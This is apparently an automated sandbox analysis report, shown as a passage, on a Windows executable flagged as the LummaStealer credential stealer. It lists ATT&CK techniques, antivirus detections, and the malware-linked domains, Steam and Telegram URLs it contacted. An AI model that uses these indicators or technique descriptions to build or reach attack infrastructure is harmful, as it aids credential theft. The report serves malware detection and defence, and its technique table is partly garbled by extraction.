              OS Credential Dumping              		321
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
              Obfuscated Files or Information              		LSASS Memory31
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol41
              Data from Local System              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
              Software Packing              		Security Account Manager1
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture14
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              biyhoksefdad.exe68%ReversingLabsWin32.Trojan.LummaStealer
              biyhoksefdad.exe61%VirustotalBrowse
              biyhoksefdad.exe100%AviraHEUR/AGEN.1314134

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://univerxes.shop/SwnNW)0%Avira URL Cloudsafe
              https://univerxes.shop/g0%Avira URL Cloudsafe
              https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=ccd2df26ae62a59bd6_1019253227700%Avira URL Cloudsafe
              https://catterjur.run/boSnzhus100%Avira URL Cloudmalware
              https://univerxes.shop/SwnNWceb0%Avira URL Cloudsafe
              https://univerxes.shop:443/SwnNWN0%Avira URL Cloudsafe
              https://univerxes.shop/SwnNWcCa0%Avira URL Cloudsafe
              https://arisechairedd.shop/100%Avira URL Cloudmalware
              https://univerxes.shop/S0%Avira URL Cloudsafe
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%Avira URL Cloudsafe
              https://garagedrootz.top/E1o100%Avira URL Cloudmalware
              https://univerxes.shop/0%Avira URL Cloudsafe
              https://catterjur.run/)100%Avira URL Cloudmalware
              https://sterpickced.digital/z100%Avira URL Cloudmalware
              https://sterpickced.digital/v100%Avira URL Cloudmalware
              https://catterjur.run/100%Avira URL Cloudmalware
              https://modelshiverd.icu/100%Avira URL Cloudmalware
              https://univerxes.shop/?0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              univerxes.shop
              		172.67.213.171
              		truetrue
                		unknown
                steamcommunity.com
                		104.73.234.102
                		truefalse
                  		high
                  t.me
                  		149.154.167.99
                  		truefalse
                    		high
                    modelshiverd.icu
                    		unknown
                    		unknownfalse
                      		high
                      garagedrootz.top
                      		unknown
                      		unknownfalse
                        		high
                        fostinjec.today
                        		unknown
                        		unknownfalse
                          		high
                          catterjur.run
                          		unknown
                          		unknownfalse
                            		high
                            sterpickced.digital
                            		unknown
                            		unknownfalse
                              		high
                              arisechairedd.shop
                              		unknown
                              		unknownfalse
                                		high
                                orangemyther.live
                                		unknown
                                		unknownfalse
                                  		high
                                  begindecafer.world
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://steamcommunity.com/profiles/76561199822375128false
                                      		high
                                      https://t.me/kz_prokla2false
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://player.vimeo.combiyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=ccd2df26ae62a59bd6_101925322770biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://steamcommunity.com/?subsection=broadcastsbiyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=oQ1d_VAfa_obiyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://univerxes.shop/SwnNW)biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.biyhoksefdad.exe, 00000000.00000003.1492041549.0000000003C92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=N4H9vOOxi8kG&l=english&ambiyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://store.steampowered.com/subscriber_agreement/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.gstatic.cn/recaptcha/biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://modelshiverd.icu/bJhnsjbiyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://arisechairedd.shop/biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.valvesoftware.com/legal.htmbiyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&abiyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.youtube.combiyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.google.combiyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2Sbiyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://univerxes.shop/gbiyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=englbiyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://univerxes.shop/SwnNWcCabiyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackbiyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://duckduckgo.com/chrome_newtabv209hbiyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=ebiyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=3Cj4p8f8grbiyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001014000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://s.ytimg.com;biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDbiyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://steam.tv/biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://univerxes.shop/Sbiyhoksefdad.exe, 00000000.00000003.1627352228.0000000001020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://univerxes.shop/SwnNWcebbiyhoksefdad.exe, 00000000.00000003.1443109110.0000000003CB4000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1446558191.0000000003CB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://store.steampowered.com/privacy_agreement/biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://store.steampowered.com/points/shop/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://ocsp.rootca1.amazontrust.com0:biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://sketchfab.combiyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://lv.queniujq.cnbiyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brbiyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.youtube.com/biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://store.steampowered.com/privacy_agreement/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=englibiyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngbiyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=1Veabiyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001014000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://catterjur.run/boSnzhusbiyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  		unknown
                                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://univerxes.shop:443/SwnNWNbiyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://www.google.com/recaptcha/biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://checkout.steampowered.com/biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bbiyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001014000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://catterjur.run/biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          		unknown
                                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngbiyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.enigmaprotector.com/biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000C46000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://catterjur.run/)biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              		unknown
                                                                                                                              https://gemini.google.com/app?q=biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://garagedrootz.top/E1obiyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                		unknown
                                                                                                                                https://store.steampowered.com/;biyhoksefdad.exe, 00000000.00000002.1710644682.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1710644682.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://store.steampowered.com/about/biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://community.cloudflare.steamstatic.com/biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://steamcommunity.com/my/wishlist/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://t.me/biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://web.telegram.orgbiyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://steamloopback.hostbiyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://help.steampowered.com/en/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://steamcommunity.com/market/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://store.steampowered.com/news/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYibiyhoksefdad.exe, 00000000.00000003.1492041549.0000000003C92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://www.enigmaprotector.com/openUbiyhoksefdad.exe, 00000000.00000002.1708761696.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://store.steampowered.com/subscriber_agreement/biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001014000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgbiyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
